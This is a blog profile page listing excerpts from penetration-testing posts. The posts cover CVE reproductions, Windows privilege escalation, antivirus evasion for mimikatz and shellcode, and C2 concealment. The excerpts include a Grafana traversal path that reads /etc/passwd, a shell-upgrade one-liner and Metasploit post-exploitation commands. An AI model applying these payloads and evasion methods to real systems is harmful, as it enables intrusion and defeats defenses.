自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(31)
  • 资源 (1)
  • 收藏
  • 关注

原创 实战 UEditor 任意文件上传漏洞

该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响 影响版本 1.4.3.3 .NET。

2022-09-08 15:24:53 1784 1

原创 记一次文件上传绕waf getshell

一次实战文件上传绕waf getshell

2022-06-06 12:34:47 572

原创 钉钉6.3.5版本-RCE漏洞复现

目录漏洞描述漏洞原理漏洞复现漏洞修复漏洞描述该漏洞可以导致6.3.5版本钉钉RCE,经过构造可直接上线。漏洞原理该漏洞让攻击者可以利用钉钉发送携带恶意JS脚本的HTML链接给受害者,受害者点击恶意链接时触发远程命令执行漏洞。漏洞特征:攻击者发送的链接格式固定:dingtalk://开头Pc_slide=true //结尾漏洞复现GitHub地址:GitHub - crazy0x70/dingtalk-RCE在本地准备好...

2022-02-28 16:26:32 5861

原创 Linux polkit提权漏洞复现

目录PwnKit漏洞描述PwnKit 漏洞原理PwnKit漏洞复现PwnKit漏洞修复PwnKit漏洞描述Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。PwnKit 漏洞原理以下是对 PwnKit 漏洞如何工作的解释。pkexec 的 main() 函数的开

2022-02-28 16:21:00 647

原创 Grafana 8.x 插件模块目录穿越漏洞复现(CVE-2021-43798)

目录漏洞环境漏洞复现漏洞环境执行如下命令启动一个Grafana 8.2.6版本服务器:docker-compose up -d访问主页漏洞复现burp抓包测试读取配置文件/public/plugins/alertlist/../../../../../../../../../../../etc/passwd读取数据库文件/public/plugins/alertlist/../../../../../../.....

2022-02-28 16:08:34 4666

原创 python3 -c ‘import pty;pty.spawn(“/bin/bash“)‘升级切换交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xtermCtrl+Zstty -astty raw -echo;fgresetstty rows 29 columns 94row和columns数据为stty -a后的数据

2022-02-28 15:50:24 3931

原创 mimikatz免杀(反射PE注入将mimikatz加载到内存运行)

在powershell中生成key.snk$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZh

2021-10-17 23:44:22 1046

原创 在Kali 2021中安装docker和docker-compose

一、安装依赖包sudo apt-get updatesudo apt -y install curl gnupg2 apt-transport-https software-properties-common ca-certificates二、导入Docker GPG密钥curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -三、将Docker储存库添加到Kali...

2021-09-30 21:34:47 3931 4

转载 Kerberos认证协议

安全系列之介绍Kerberos认证协议_lishinho的博客-CSDN博客_kerberos认证协议前言一直以来Kerberos都是应用广泛的强/集群安全/网络身份验证/协议,虽然讲解资料也不少,但和HDFS一样很少有讲通的,很多都是使用kerberos原始论文的概念直接塞给读者,造成很多概念闭塞难懂。或者是讲故事买门票坐火车,例子很好懂,但没有和技术结合起来。这篇会按照理解难度从易到难,划分为四个部分,试着解决上边的问题统一做一下总结。目录前言一,入门 · Kerberos介绍二,表面 · 理解Kerb

2021-09-20 16:56:56 152

转载 C2使用云函数进行隐藏和加速

C2使用云函数进行隐藏和加速利用云函数将我们的请求进行转发(和一些使用第三方应用进行转发是一样的);C2客户端发出的流量经过 云函数的转发,到达我们的C2服务器,达到隐藏的效果https://mp.weixin.qq.com/s/gfBE-HaUCgQw8L0QByqTDA...

2021-09-18 21:13:55 413

转载 隐藏C2服务器IP的各种方法总结

利用CDN、域前置、重定向三种技术隐藏C2的区别_Shanfenglan's blog-CSDN博客_域前置前言这个课题前段时间已经分别做过研究,但没有写三者的区别分析,以为自己可以将三种技术永远记在心里,但是事实是确实淡忘一部分知识点,导致现在对三者的理解出现偏差。反思:以后倘若需要做技术记录,一定要详细详细再详细,有备无患。不能抱有侥幸心理,因为你永远不知道,问题与遗忘哪一个会先来对于三种隐藏技术的理解CDN技术隐藏C2反溯源-cs和msf域名上线利用CDN隐藏C2地址使用CDN

2021-09-18 20:57:46 973

原创 python3 cobalt strike msf shellcode反序列化bypass 360,火绒

本文仅以分离免杀为例,利用Python语言制作加载器对Cobaltstrike生成的Shellcode进行绕过杀软作为样例,举例说明通过加密Shellcode、分离免杀以及Python反序列化达到bypass的思路和方法。原理:我们原始的shellcode加载器是直接把shellcode放在里面进行运行,然而我们的分离免杀整体流程是将我们的Shellcode与程序进行分离,而上传到目标的可执行程序仅作为一个类似于下载器的程序使用,例如我们可以搭建一个Http Server,之后构造我们的Shel

2021-09-07 15:36:51 927 1

转载 DNSlog无回显注入及其原理

原理DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。具体使用详情参考:https://blog.csdn.net/qq_35569814/article/details/100348097https://www.cnblogs.com/a.

2021-07-18 12:17:16 591

原创 post后渗透模块

run post/windows/gather/enum_on_users#查看登录过的用户信息run post/windows/gather/enum_ad_groups #查看组信息run post/windows/gather/enum_domain #定位域控run post/windows/gather/enum_ad_computers #域内所有机器run post/windows/manage/migrate...

2021-07-16 16:38:06 528

原创 VulnStack靶场渗透测试

一、信息收集主机发现netdiscover -i eth0 -r 192.168.1.0/24目标IP:192.168.1.136端口扫描sudo masscan -p 1-65535 192.168.1.136 --rate=1000目录扫描gobuster -m dir -fw -u 192.168.1.136 -w /usr/share/wordlists/dirb/big.txt -t 50看到有个phpMyAdmin访问有弱口令root root

2021-07-08 23:19:12 406

原创 google禁用js插件Quick Javascript Switcher

GitHub地址:https://github.com/maximelebreton/quick-javascript-switcher先去GitHub上下载zip文件,然后解压设置中找到扩展程序并打开开发者模式,加载已解压的扩展程序选择解压出来的src文件夹即可安装完成如下使用时直接点击即可,关闭只需要再点击...

2021-07-02 22:02:01 1358 1

原创 gobuster-暴力破解目录,子域名

GitHub地址:https://github.com/OJ/gobuster主要有这几种模式dir - 经典的目录暴力破解模式 dns - DNS 子域暴力破解模式 s3 - 枚举打开的 S3 存储桶并查找存在和存储桶列表 vhost - 虚拟主机暴力破解模式(与 DNS 不同!)常用模式以及命令dir模式gobuster -m dir -fw -u https://mysite.com/path/to/folder -t 50 -w common-files.txt -x .p

2021-06-30 22:11:49 2085

原创 使用mode.xsl把nmap扫描输出报告美化

首先扫描一下端口nmap -sT -sV 192.168.1.193扫描端口详细信息并输出到文档nmap -A -sV -p 21,80,999,3389,5985,6588 192.168.1.193 -oA nmaplist使用模板文件mode.xsl把输出的文档美化成html网页文档xsltproc -o <新生成的html文档> mode.xsl <nmap生成输出的文档>xsltproc -o nmaplist.html mode.xsl

2021-06-30 18:44:47 1287 1

原创 meterpreter里面cmd乱码解决方法chcp 65001

当我们使用meterpreter反弹shell后使用是乱码时可以采用如下命令解决chcp 65501chcp是一个计算机指令,能够显示或设置活动代码页编号。65001 UTF-8代码页950 繁体中文936 简体中文默认的GBK437 MS-DOS美国英语...

2021-06-26 15:30:24 1739

原创 kali中用python建立简单的web服务器下载文件

我们可以用如下命令来建立web服务器我们在一个sudo python -m SimpleHTTPServer 80

2021-06-15 00:24:53 3013 6

原创 端口扫描工具masscan常用方法和参数

masscan堪称最快的端口扫描工具kali中自带有masscan常用方法如下sudo masscan -p 0-65535 192.168.1.100 --rate=10000

2021-06-14 15:37:47 2712

原创 msf 使用mimikatz获取明文密码过程中报错Retrieving wdigest credentials

当我们用meterpreter提权成功之后

2021-06-02 20:16:32 1568

原创 windows提权常用系统漏洞与对应的补丁编号

CVE-2021-1732[Windows Win32k 提权漏洞] (Windows 10, 2019/20H2) CVE-2020-0787【Windows后台智能传输服务提权漏洞】(Windows 7/8/10、2008/2012/2016/2019) CVE-2020-0796[Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在一个远程代码执行漏洞,即“Windows SMBv3 客户端/服务器远程代码执行漏洞”] (Windows 1903/1909..

2021-05-29 21:22:01 4617

转载 Meterpreter命令详解

0x01初识Meterpreter1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.

2021-05-29 21:07:00 2546

原创 nmap一般使用方法及其原理

Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字Nmap是Network Mapper的简称。Nmap最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下,该工具逐渐成为最为流行安全必备工具之一。最新版的Nmap6.0在2012年5月21日发布,详情请参见:www.nmap.org。一般情况下,Nmap用于列举网络主机清单、管理服务升级调度、监控主机或服务运行状况。Nmap可以检测目标机是否在线、

2021-05-25 23:45:20 776

原创 详细通用phpstudy本地搭建网站以及cms搭建教程

示例是极致cms首先点创建网站,注意点在图中标红的地方注意php的版本,很多cms都有版本要求,版本太低的话可能就不行常见数据库输入用户名和密码,待会儿建站的时候要用数据库建好后可以看到,密码鼠标放到上面就可以看到明文的密码然后进入网站根目录,然后把cms解压到目录中即可如下然后打开网站安装和配置网站数据库一般只需要填数据库账号和密码即可,可以对比着图三来填安装完成并导入演示数据最后就可以访问首页了其他的cms的简单安装方法

2021-05-19 21:49:13 8308 2

原创 以一种访问权限不允许的方式做了一个访问套接字的尝试。

打开PHP study的apache时报错

2021-05-19 20:59:47 16092

原创 pip: command not found

下载# wget https://bootstrap.pypa.io/get-pip.py安装# python3 get-pip.py查看版本# pip -V查看安装路径# find / -name pip将pip添加到系统命令# ln -s /usr/local/bin/pip /usr/bin/pip

2021-05-19 01:13:14 266

原创 wget: 无法解析主机地址

进入vim /etc/resolv.conf

2021-05-19 01:00:37 645

原创 Empire安装及其常见问题 Empire网盘下载

简介Empire是一款针对Windows平台的,使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powershell

2021-05-19 00:42:18 646 2

转载 常规WEB渗透测试漏洞描述及修复建议

常规WEB渗透测试漏洞描述及修复 (1)Apache样例文件泄漏(2)弱口令(3)明文传输登录口令(4)暴力破解(5)SQL注入漏洞(6)跨站脚本攻击(xss)漏洞(7)目标服务器启用了不安全HTTP方法(8)任意文件上传(9)测试页面泄漏在外网(10)目录浏览(11)phpinfo信息泄漏(12)未授权访问(13)越权访问(14)命令执行漏洞(15)应用程序错误信息泄露(16)LDAP注入(17)文件包含漏洞(18)网站敏感压缩文件泄露(19)CRLF HTTP 头部注入漏洞(20)URL 跳转漏洞(21

2021-05-12 23:22:10 1152

nmap扫描报告美化模板mode.xsl

使用模板美化后看起来更直观,用过的都说好! 使用教程:https://blog.csdn.net/X_sweelg/article/details/118367076

2021-07-01

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除